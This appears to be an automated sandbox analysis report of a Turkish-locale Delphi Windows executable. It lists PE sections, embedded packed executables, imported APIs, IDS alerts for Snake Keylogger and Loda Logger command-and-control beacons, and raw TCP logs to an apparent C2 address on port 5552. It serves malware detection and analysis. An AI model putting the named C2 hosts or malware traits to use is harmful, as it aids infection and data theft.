                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0xa40180x21.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0xa40000x18.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      CODE0x10000x99bec0x99c0033fbe30e8a64654287edd1bf05ae7c8cFalse0.5141641260162602data6.572957870355296IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      DATA0x9b0000x2e540x30001f5e19e7d20c1d128443d738ac7bc610False0.453125data4.854620797809023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      BSS0x9e0000x11e50x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .idata0xa00000x2a420x2c0021ff53180b390dc06e3a1adf0e57a073False0.3537819602272727data4.919333216027082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .tls0xa30000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .rdata0xa40000x390x200a92cf494c617731a527994013429ad97False0.119140625MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"0.7846201577093705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                      .reloc0xa50000xa9800xaa00dcd1b1c3f3d28d444920211170d1e8e6False0.5899816176470588data6.674124985579511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                      .rsrc0xb00000xf25300xf26008a289c0cf2c2e66f01330fe7458e336aFalse0.8940920738782878data7.780762560557007IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      RT_CURSOR0xb0dc80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                                                      RT_CURSOR0xb0efc0x134data0.4642857142857143
                                                                                                                      RT_CURSOR0xb10300x134data0.4805194805194805
                                                                                                                      RT_CURSOR0xb11640x134data0.38311688311688313
                                                                                                                      RT_CURSOR0xb12980x134data0.36038961038961037
                                                                                                                      RT_CURSOR0xb13cc0x134data0.4090909090909091
                                                                                                                      RT_CURSOR0xb15000x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                                                      RT_BITMAP0xb16340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                      RT_BITMAP0xb18040x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                                                                                      RT_BITMAP0xb19e80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                      RT_BITMAP0xb1bb80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                                                                                      RT_BITMAP0xb1d880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                                                                                      RT_BITMAP0xb1f580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                                                                                      RT_BITMAP0xb21280x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                                                                                      RT_BITMAP0xb22f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                      RT_BITMAP0xb24c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                                                                                      RT_BITMAP0xb26980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                      RT_BITMAP0xb28680xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                                                                                      RT_ICON0xb29500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.1472795497185741
                                                                                                                      RT_ICON0xb39f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 8192TurkishTurkey0.2101313320825516
                                                                                                                      RT_DIALOG0xb4aa00x52data0.7682926829268293
                                                                                                                      RT_STRING0xb4af40x358data0.3796728971962617
                                                                                                                      RT_STRING0xb4e4c0x428data0.37406015037593987
                                                                                                                      RT_STRING0xb52740x3a4data0.40879828326180256
                                                                                                                      RT_STRING0xb56180x3bcdata0.33472803347280333
                                                                                                                      RT_STRING0xb59d40x2d4data0.4654696132596685
                                                                                                                      RT_STRING0xb5ca80x334data0.42804878048780487
                                                                                                                      RT_STRING0xb5fdc0x42cdata0.42602996254681647
                                                                                                                      RT_STRING0xb64080x1f0data0.4213709677419355
                                                                                                                      RT_STRING0xb65f80x1c0data0.44419642857142855
                                                                                                                      RT_STRING0xb67b80xdcdata0.6
                                                                                                                      RT_STRING0xb68940x320data0.45125
                                                                                                                      RT_STRING0xb6bb40xd8data0.5879629629629629
                                                                                                                      RT_STRING0xb6c8c0x118data0.5678571428571428
                                                                                                                      RT_STRING0xb6da40x268data0.4707792207792208
                                                                                                                      RT_STRING0xb700c0x3f8data0.37598425196850394
                                                                                                                      RT_STRING0xb74040x378data0.41103603603603606
                                                                                                                      RT_STRING0xb777c0x380data0.35379464285714285
                                                                                                                      RT_STRING0xb7afc0x374data0.4061085972850679
                                                                                                                      RT_STRING0xb7e700xe0data0.5535714285714286
                                                                                                                      RT_STRING0xb7f500xbcdata0.526595744680851
                                                                                                                      RT_STRING0xb800c0x368data0.40940366972477066
                                                                                                                      RT_STRING0xb83740x3fcdata0.34901960784313724
                                                                                                                      RT_STRING0xb87700x2fcdata0.36649214659685864
                                                                                                                      RT_STRING0xb8a6c0x354data0.31572769953051644
                                                                                                                      RT_RCDATA0xb8dc00x44data0.8676470588235294
                                                                                                                      RT_RCDATA0xb8e040x10data1.5
                                                                                                                      RT_RCDATA0xb8e140xe0800PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed0.9261314205178174
                                                                                                                      RT_RCDATA0x1996140x3ASCII text, with no line terminatorsTurkishTurkey3.6666666666666665
                                                                                                                      RT_RCDATA0x1996180x3c00PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsTurkishTurkey0.54296875
                                                                                                                      RT_RCDATA0x19d2180x64cdata0.5998759305210918
                                                                                                                      RT_RCDATA0x19d8640x153Delphi compiled form 'TFormVir'0.7522123893805309
                                                                                                                      RT_RCDATA0x19d9b80x47d3Microsoft Excel 2007+TurkishTurkey0.8675150921846957
                                                                                                                      RT_GROUP_CURSOR0x1a218c0x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                      RT_GROUP_CURSOR0x1a21a00x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                      RT_GROUP_CURSOR0x1a21b40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                      RT_GROUP_CURSOR0x1a21c80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                      RT_GROUP_CURSOR0x1a21dc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                      RT_GROUP_CURSOR0x1a21f00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                      RT_GROUP_CURSOR0x1a22040x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                      RT_GROUP_ICON0x1a22180x14dataTurkishTurkey1.1
                                                                                                                      RT_VERSION0x1a222c0x304dataTurkishTurkey0.42875647668393785
                                                                                                                      DLLImport
                                                                                                                      kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                                                      user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                      oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                      kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                      advapi32.dllRegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
                                                                                                                      kernel32.dlllstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
                                                                                                                      version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                      gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                                                      user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                      ole32.dllCLSIDFromString
                                                                                                                      kernel32.dllSleep
                                                                                                                      oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                                      ole32.dllCLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
                                                                                                                      oleaut32.dllGetErrorInfo, SysFreeString
                                                                                                                      comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                                      shell32.dllShellExecuteExA, ExtractIconExW
                                                                                                                      wininet.dllInternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
                                                                                                                      shell32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
                                                                                                                      advapi32.dllOpenSCManagerA, CloseServiceHandle
                                                                                                                      wsock32.dllWSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
                                                                                                                      netapi32.dllNetbios
                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                      TurkishTurkey
                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                      2024-12-30T11:34:14.559856+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849740172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:34:14.559856+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849742172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:34:14.559856+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849727172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:34:14.559856+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849754172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:34:14.559856+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849743172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:34:14.559856+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849749172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:34:14.559856+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849746172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:34:14.559856+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849753172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:34:14.559856+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849744172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:34:14.559856+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849755172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:34:14.559856+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849756172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:34:14.559856+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849752172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:34:14.559856+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849747172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:34:30.542679+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.849712172.217.16.206443TCP
                                                                                                                      2024-12-30T11:34:30.560462+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.849711172.217.16.206443TCP
                                                                                                                      2024-12-30T11:34:30.992449+01002832617ETPRO MALWARE W32.Bloat-A Checkin1192.168.2.84971569.42.215.25280TCP
                                                                                                                      2024-12-30T11:34:31.719148+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.849716172.217.16.206443TCP
                                                                                                                      2024-12-30T11:34:31.719400+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.849717172.217.16.206443TCP
                                                                                                                      2024-12-30T11:34:32.378978+01002822116ETPRO MALWARE Loda Logger CnC Beacon1192.168.2.849727172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:34:32.378978+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849727172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:34:38.590833+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.849723172.217.16.206443TCP
                                                                                                                      2024-12-30T11:34:38.619255+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.849724172.217.16.206443TCP
                                                                                                                      2024-12-30T11:34:41.461796+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849740172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:34:50.555738+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849742172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:34:59.575488+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849743172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:35:08.620830+01002822116ETPRO MALWARE Loda Logger CnC Beacon1192.168.2.849744172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:35:08.620830+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849744172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:35:17.680424+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849746172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:35:26.770725+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849747172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:35:35.884801+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849749172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:35:44.894680+01002822116ETPRO MALWARE Loda Logger CnC Beacon1192.168.2.849752172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:35:44.894680+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849752172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:35:53.901669+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849753172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:36:02.973449+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849754172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:36:11.993456+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849755172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:36:21.071387+01002822116ETPRO MALWARE Loda Logger CnC Beacon1192.168.2.849756172.111.138.1005552TCP
                                                                                                                      2024-12-30T11:36:21.071387+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849756172.111.138.1005552TCP
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 30, 2024 11:34:29.531068087 CET49711443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:29.531117916 CET44349711172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:29.531302929 CET49711443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:29.537357092 CET49712443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:29.537406921 CET44349712172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:29.537468910 CET49712443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:29.562864065 CET49712443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:29.562889099 CET49711443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:29.562901974 CET44349712172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:29.562910080 CET44349711172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.167927027 CET44349712172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.168006897 CET49712443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.168693066 CET44349712172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.168745041 CET49712443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.181504011 CET44349711172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.181648970 CET49711443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.182262897 CET44349711172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.182365894 CET49711443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.255979061 CET49711443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.255997896 CET44349711172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.256366014 CET44349711172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.256529093 CET49711443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.257061958 CET49712443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.257093906 CET44349712172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.257390022 CET44349712172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.257441998 CET49712443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.259265900 CET49712443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.259342909 CET49711443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.299333096 CET44349712172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.307344913 CET44349711172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.402915001 CET4971580192.168.2.869.42.215.252
                                                                                                                      Dec 30, 2024 11:34:30.407876968 CET804971569.42.215.252192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.407960892 CET4971580192.168.2.869.42.215.252
                                                                                                                      Dec 30, 2024 11:34:30.408147097 CET4971580192.168.2.869.42.215.252
                                                                                                                      Dec 30, 2024 11:34:30.412926912 CET804971569.42.215.252192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.542715073 CET44349712172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.542800903 CET44349712172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.542804003 CET49712443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.542844057 CET49712443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.559371948 CET49712443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.559428930 CET44349712172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.560179949 CET44349711172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.560281992 CET49711443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.561646938 CET49716443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.561692953 CET44349716172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.561844110 CET49716443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.561845064 CET44349711172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.561899900 CET44349711172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.561999083 CET49711443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.561999083 CET49711443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.562097073 CET49711443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.562108040 CET44349711172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.562161922 CET49711443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.563066006 CET49711443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.574562073 CET49717443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.574603081 CET44349717172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.574749947 CET49717443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.574820042 CET49716443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.574840069 CET44349716172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.575176001 CET49717443192.168.2.8172.217.16.206
                                                                                                                      Dec 30, 2024 11:34:30.575187922 CET44349717172.217.16.206192.168.2.8
                                                                                                                      Dec 30, 2024 11:34:30.582351923 CET49718443192.168.2.8142.250.185.193
